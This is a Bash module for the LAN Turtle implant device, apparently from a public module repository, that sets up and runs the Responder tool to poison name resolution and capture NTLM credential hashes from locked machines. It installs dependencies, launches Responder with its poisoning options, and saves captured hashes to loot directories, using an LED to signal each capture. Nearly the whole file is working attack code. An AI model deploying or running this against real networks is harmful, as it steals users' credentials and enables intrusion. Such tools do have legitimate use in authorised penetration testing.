lanturtle-modules/modules/QuickCreds

170 lines
4.7 KiB
Bash

#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.3"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
CONF=/tmp/QuickCreds.form
: ${DIALOG_OK=0}
: ${DIALOG_CANCEL=1}
: ${DIALOG_HELP=2}
: ${DIALOG_EXTRA=3}
: ${DIALOG_ITEM_HELP=4}
: ${DIALOG_ESC=255}
function configure {
# dialog --title "QuickCreds" --msgbox "\n\
# Dependencies will be installed. An Internet connection is required.\n\
# Upon configuration creds will be saved to /root/loot/ on boot." 9 72
dialog --title "QuickCreds" \
--yesno "\nInstall dependencies and configure QuickCreds?\n\
An Internet connection is required for installation.\n" 8 60
response=$?
case $response in
0) ;;
1) exit ;;
255) exit ;;
esac
# Check to see if QuickCreds has already been configured
if [[ -d /root/loot || -s /root/loot/responder.log ]];
then
dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\
Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72
exit 1
fi
# Check for Internet connection
ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
:
} || {
dialog --title "QuickCreds" --msgbox "\n\
The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72
exit 1
}
# Install dependencies
opkg update | dialog --progressbox "Updating opkg" 14 72
if [[ ! $(opkg list-installed | grep git) ]];
then
opkg install git | dialog --progressbox "Installing dependency git" 14 72
fi
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
then
opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72
fi
if [[ ! $(opkg list-installed | grep screen) ]];
then
opkg install screen | dialog --progressbox "Installing dependency screen" 14 72
fi
if [[ ! $(opkg list-installed | grep python-openssl) ]];
then
opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72
fi
if [[ ! $(opkg list-installed | grep coreutils-sleep) ]];
then
opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72
fi
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]];
then
rm -rf /etc/turtle/Responder
git clone git://github.com/lgandx/responder /etc/turtle/Responder -q | dialog --progressbox "Installing dependency responder" 14 72
rm -rf /etc/turtle/Responder/.git
fi
# Setup loot directory and complete setup
mkdir /root/loot
touch /root/loot/responder.log
dialog --title "QuickCreds" --msgbox "\n\
Configuration complete. Creds will be saved to /root/loot\n\
Enable this module to have it start the attack on boot.\n" 9 72
}
function start {
# Stop on-off-on DHCP blink pattern script
echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
echo ""
echo "QuickCreds started."
echo "LED will blink rapidly while QuickCreds is running."
echo "LED will light solid upon NTLM hash capture."
echo ""
echo "If starting this module from the Turtle Shell menu,"
echo "press CTRL+C to return."
echo "Starting attack..." >> /root/loot/responder.log
# Create new numbered loot directory and symlink it from Responder logs
cd /root/loot
dircount=$(ls -lad /root/loot/* | wc -l)
mkdir /root/loot/$((dircount))
# Delete all current Responder logs
rm -rf /etc/turtle/Responder/logs
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
# Stop dnsmasq
/etc/init.d/dnsmasq stop 1&> /dev/null
# Execute attack
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
# Blink upon hash capture
while true; do
# Grep for user creds and do not match on machine creds, machine usernames end in $
if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
then
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
then
echo "Creds saved!" >> /root/loot/responder.log
#copy all responder logs to loot directory
cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
finished
fi
fi
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.04
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.04
done
}
function finished {
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
exit
}
function stop {
kill $(ps | grep [R]esponder | awk {'print $1'})
/etc/init.d/dnsmasq start 1&> /dev/null
echo "QuickCreds Stopped"
}
function status {
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
}